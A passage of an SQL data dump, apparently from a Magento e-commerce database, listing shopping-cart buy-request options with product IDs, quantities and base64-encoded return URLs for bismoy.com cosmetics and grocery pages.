(71, 63, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(72, 64, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(73, 65, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(74, 66, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(75, 67, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":1}'),
(76, 68, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(77, 69, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(78, 70, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(79, 71, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(80, 72, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(81, 73, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(82, 74, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(83, 75, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(84, 76, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(85, 77, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(86, 78, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\",\"item\":\"2061\"}'),
(87, 79, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\",\"item\":\"2061\"}'),
(88, 80, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(89, 81, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(90, 82, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(91, 83, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(92, 84, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(93, 85, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2064\",\"qty\":1}'),
(94, 86, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2061\",\"qty\":1}'),
(95, 87, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2058\",\"qty\":1}'),
(96, 88, 2055, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2055\",\"qty\":1}'),
(97, 89, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2063\",\"qty\":1}'),
(98, 90, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2062\",\"qty\":1}'),
(99, 91, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2060\",\"qty\":1}'),
(100, 92, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZ3JvY2VyeS5odG1s\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\"],\"qty\":\"1\"}'),
(101, 93, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY29zbWV0aWNzLmh0bWw,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\"],\"qty\":\"1\"}'),
(102, 94, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\"],\"qty\":\"1\"}'),
(103, 95, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\"],\"qty\":\"1\"}'),
(104, 96, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\"],\"qty\":\"1\"}'),
(105, 97, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(106, 98, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(107, 99, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(108, 100, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(109, 101, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(110, 102, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(111, 103, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(112, 104, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZ3JvY2VyeS5odG1s\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(113, 105, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY29zbWV0aWNzLmh0bWw,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(114, 106, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(115, 107, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(116, 108, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(117, 109, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(118, 110, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(119, 111, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(120, 112, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZ3JvY2VyeS5odG1s\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(121, 113, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(122, 114, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY29zbWV0aWNzLmh0bWw,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(123, 115, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(124, 116, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(125, 117, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(126, 118, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":1}'),
(127, 119, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(128, 120, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(129, 121, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZ3JvY2VyeS5odG1s\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(130, 122, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY29zbWV0aWNzLmh0bWw,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(131, 123, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(132, 124, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"[]\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(133, 125, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZ3JvY2VyeS5odG1s\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(134, 126, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY3JlYW0uaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(135, 127, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(136, 128, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY29zbWV0aWNzLmh0bWw,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(137, 129, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"super_attribute\":[\"\",\"\"],\"bundle_option\":[\"\",\"\"],\"bundle_option_qty\":[\"\",\"\"],\"qty\":\"1\",\"product_page\":\"true\"}'),
(138, 130, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(139, 131, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(140, 132, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(141, 133, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(142, 134, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(143, 135, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(144, 136, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(145, 137, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(146, 138, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(147, 139, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2gtb3JuYW1lbnRhbC1sZW1vbi1leHRyYWN0LW1hZGUtZnJvbS1uYXR1cmFsLmh0bWw,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":1}'),
(148, 140, 2054, 'info_buyRequest', '{\"qty\":1}'),
(149, 141, 2054, 'info_buyRequest', '{\"qty\":1}'),
(150, 142, 2054, 'info_buyRequest', '{\"qty\":1}'),
(151, 143, 2054, 'info_buyRequest', '{\"qty\":1}'),
(152, 144, 2054, 'info_buyRequest', '{\"qty\":1}'),
(153, 145, 2054, 'info_buyRequest', '{\"qty\":1}'),
(154, 146, 2054, 'info_buyRequest', '{\"qty\":1}'),
(155, 147, 2054, 'info_buyRequest', '{\"qty\":1}'),
(156, 148, 2054, 'info_buyRequest', '{\"qty\":1}'),
(157, 149, 2059, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tb2lzdHVyaXplaW5nLWZhY2Utd2FzaC5odG1s\",\"product\":\"2059\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2059\",\"qty\":\"1\"}'),
(158, 150, 2054, 'info_buyRequest', '{\"qty\":1}'),
(159, 151, 2054, 'info_buyRequest', '{\"qty\":1}'),
(160, 152, 2054, 'info_buyRequest', '{\"qty\":1}'),
(161, 153, 2054, 'info_buyRequest', '{\"qty\":1}'),
(162, 154, 2054, 'info_buyRequest', '{\"qty\":1}'),
(163, 155, 2054, 'info_buyRequest', '{\"qty\":1}'),
(164, 156, 2054, 'info_buyRequest', '{\"qty\":1}'),
(165, 157, 2054, 'info_buyRequest', '{\"qty\":1}'),
(166, 158, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2063\",\"qty\":1}'),
(167, 159, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(168, 160, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(169, 161, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(170, 162, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(171, 163, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(172, 164, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
(173, 165, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tb2lzdHVyaXplaW5nLWZhY2Utd2FzaC1vcm5hbWVudGFsLWxlbW9uLWV4dHJhY3QtbWFkZS1mcm9tLW5hdHVyYWwuaHRtbA,,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":\"1\",\"ajax\":\"1\"}'),
(174, 166, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tb2lzdHVyaXplaW5nLWZhY2Utd2FzaC1vcm5hbWVudGFsLWxlbW9uLWV4dHJhY3QtbWFkZS1mcm9tLW5hdHVyYWwuaHRtbA,,\",\"product\":\"2060\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2060\",\"qty\":\"1\",\"ajax\":\"1\"}'),
(175, 167, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(176, 168, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(177, 169, 2054, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vZy1jbGVhbi1oYW5kd2FzaC1saXF1aWQtc29hcC1wdW1wLTIwMG1sLTIwMC0wMC5odG1s\",\"product\":\"2054\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2054\",\"qty\":1}'),
(178, 170, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2061\",\"qty\":1}'),
(179, 171, 2055, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2055\",\"qty\":1}'),
(180, 172, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2064\",\"qty\":1}'),
(181, 173, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2058\",\"qty\":1}'),
(182, 174, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2060\",\"qty\":1}'),
(183, 175, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2063\",\"qty\":1}'),
(184, 176, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2Nvc21ldGljcy5odG1s\",\"product\":\"2062\",\"qty\":1}'),
(185, 177, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":1}'),
